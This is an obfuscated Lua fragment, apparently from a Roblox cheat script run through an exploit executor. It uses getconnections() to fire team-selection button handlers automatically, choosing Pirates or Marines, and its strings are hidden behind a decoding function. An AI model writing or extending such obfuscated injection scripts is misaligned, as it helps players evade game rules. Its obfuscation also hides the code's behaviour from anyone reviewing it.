_G.Team=v7("\219\217\5\52\171\137\241\23\120","\194\231\148\100\70");if (((_G.Team==v7("\26\124\200\177\247\220\67\95\159","\168\38\44\161\195\150")) or (_G.Team==v7("\220\209\131\100\57\230\179\5\222","\118\224\156\226\22\80\136\214"))) and  not join) then local v138=1259 -(233 + 1026) ;while true do if (v138==(1666 -(636 + 1030))) then repeat wait();pcall(function() join=game.Players.localPlayer.Neutral==false ;if (_G.Team==v7("\114\231\75\129\86\235\74","\224\34\142\57")) then for v253,v254 in pairs({v7("\243\168\208\206\118\211\72\26\202\168\203\140\80\253\84\13\213","\110\190\199\165\189\19\145\61"),v7("\247\228\98\251\142\229\207\255\99\231\133\150\254\228\96\230","\167\186\139\23\136\235"),v7("\59\182\156\4\12\180\156\8\30","\109\122\213\232")}) do for v255,v256 in pairs(getconnections(game:GetService(v7("\222\251\163\41\235\229\177","\80\142\151\194")).LocalPlayer.PlayerGui.Main.ChooseTeam.Container.Pirates.Frame.ViewportFrame.TextButton[v254])) do v256.Function();end end elseif (_G.Team==v7("\95\235\118\94\10\200\114\95\93","\44\99\166\23")) then for v258,v259 in pairs({v7("\81\248\60\37\54\134\105\227\61\57\61\245\95\251\32\53\56","\196\28\151\73\86\83"),v7("\222\12\60\3\135\122\13\98\231\12\39\65\166\87\15\120","\22\147\99\73\112\226\56\120"),v7("\153\118\246\252\155\185\97\231\241","\237\216\21\130\149")}) do for v262,v263 in pairs(getconnections(game:GetService(v7("\178\66\94\70\181\219\77","\62\226\46\63\63\208\169")).LocalPlayer.PlayerGui.Main.ChooseTeam.Container.Marines.Frame.ViewportFrame.TextButton[v259])) do v263.Function();end end else for v260,v261 in pairs({v7("\200\22\64\144\26\47\58\74\241\22\91\210\60\1\38\93\238","\62\133\121\53\227\127\109\79"),v7("\61\27\39\230\211\140\183\4\0\61\251\135\138\173\7\26","\194\112\116\82\149\182\206"),v7("\24\171\88\17\214\227\26\60\172","\110\89\200\44\120\160\130")}) do for v264,v265 in pairs(getconnections(game:GetService(v7("\155\207\74\95\70\88\40","\45\203\163\43\38\35\42\91")).LocalPlayer.PlayerGui.Main.ChooseTeam.Container.Marines.Frame.ViewportFrame.TextButton[v261])) do v265.Function();end end end end);until join==true  game:GetService(v7("\226\137\221\58\130\187\71","\52\178\229\188\67\231\201")).LocalPlayer.PlayerGui.Main.ChooseTeam.Visible=false;break;end end end
